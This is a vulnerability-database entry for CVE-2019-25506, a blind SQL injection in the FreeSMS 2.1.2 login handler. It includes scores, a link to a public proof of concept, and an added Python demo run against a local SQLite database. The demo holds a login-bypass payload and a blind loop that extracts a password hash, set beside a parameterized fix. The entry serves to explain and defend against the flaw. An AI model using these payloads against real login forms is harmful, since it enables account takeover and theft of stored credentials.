CVE-2019-25506

HIGH

FreeSMS 2.1.2 - SQL Injection

Title source: llm

Description

FreeSMS 2.1.2 contains a boolean-based blind SQL injection (CWE-89) in the password parameter of the login handler at /pages/crc_handler.php?method=login. The parameter reaches the authentication query without being neutralized, so an unauthenticated attacker who knows a valid username can inject SQL that makes the password check succeed and log in as that user; the same login oracle (success or failure of the request) can be used to infer database contents one condition at a time. Once authenticated, the attacker can set a new password for the account through the profile update function.
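The following is an added illustration of the bug class described above, not FreeSMS code: the real crc_handler.php query is not reproduced here. It assumes a login that concatenates the submitted password into the WHERE clause inside an md5() call (table name, column names, the md5 comparison and the sample user are all assumptions), with SQLite standing in for the application's database. It shows the authentication bypass through the password parameter, the boolean-based blind extraction that the same oracle enables, and the parameterized query that closes the hole.

```python
"""CWE-89 in a login handler: vulnerable concatenation vs. parameterized query.

Added example for the CVE-2019-25506 entry; not the FreeSMS source.
Assumptions: users(username, password) table, password stored as an MD5 hex
digest and compared in SQL as password = md5('<input>'), SQLite as the
backend. Sample data is constructed inline.
"""
import hashlib
import sqlite3

HEX = "0123456789abcdef"
DEMO_PASSWORD = "s3cret"                                   # constructed
DEMO_PASSWORD_HASH = hashlib.md5(DEMO_PASSWORD.encode()).hexdigest()

# Bypass payload for the password parameter: closes the md5('...') literal,
# ORs in the target account, and comments out the rest of the query.
BYPASS_PAYLOAD = "') OR username = 'admin' -- "


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed user and an md5() UDF."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no MD5; register one so the query shape matches a MySQL-style
    # password = md5('...') comparison (assumption about the app, see above).
    conn.create_function("md5", 1, lambda s: hashlib.md5(s.encode()).hexdigest())
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", DEMO_PASSWORD_HASH))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Vulnerable pattern: both inputs are spliced into the SQL text.

    Returns the authenticated username, or None. The password parameter is
    the injection point, as in the advisory.
    """
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = md5('%s')"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn: sqlite3.Connection, username: str, password: str):
    """Fixed pattern: bound parameters, so input is data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = md5(?)",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def extract_hash_blind(conn: sqlite3.Connection, target: str, length: int = 32) -> str:
    """Boolean-based blind extraction through the same injection point.

    The only signal is whether login succeeds. Each request asks one yes/no
    question about one character of the target's stored hash; the username
    sent alongside is irrelevant because the injected OR selects the target.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            payload = ("') OR (username = '%s' AND substr(password, %d, 1) = '%s') -- "
                       % (target, pos, c))
            if login_vulnerable(conn, "nobody", payload) == target:
                recovered += c
                break
        else:
            raise RuntimeError("no hex digit matched at position %d" % pos)
    return recovered


def demo() -> dict:
    """Run all three scenarios against the constructed database."""
    conn = make_db()
    return {
        "legit_vuln": login_vulnerable(conn, "admin", DEMO_PASSWORD),
        "bypass_vuln": login_vulnerable(conn, "admin", BYPASS_PAYLOAD),
        "legit_fixed": login_hardened(conn, "admin", DEMO_PASSWORD),
        "bypass_fixed": login_hardened(conn, "admin", BYPASS_PAYLOAD),
        "blind_hash": extract_hash_blind(conn, "admin"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", v)
```

The blind loop needs at most 16 requests per hex digit, so the full 32-character hash costs at most 512 login attempts; in the real application each one is an HTTP request to the login endpoint, which is exactly the traffic a rate limit or a WAF rule on repeated failed logins from one source would flag. Parameterizing the query removes both the bypass and the oracle; replacing the unsalted MD5 with a proper password hash (bcrypt or Argon2, computed in application code) is a separate hardening step that the example does not attempt.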

Exploits (1)

exploitdb (working PoC)
by Yilmaz Degirmenci · tags: python, webapps, php
https://www.exploit-db.com/exploits/46658

Scores

CVSS v3 8.2
EPSS 0.0033
EPSS Percentile 56.0%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact partial

Details

CWE
CWE-89
Status published
Products (2)
Freesms/FreeSMS 2.1.2
freesms_project/freesms < 2.1.2
Published Mar 04, 2026
Tracked Since Mar 05, 2026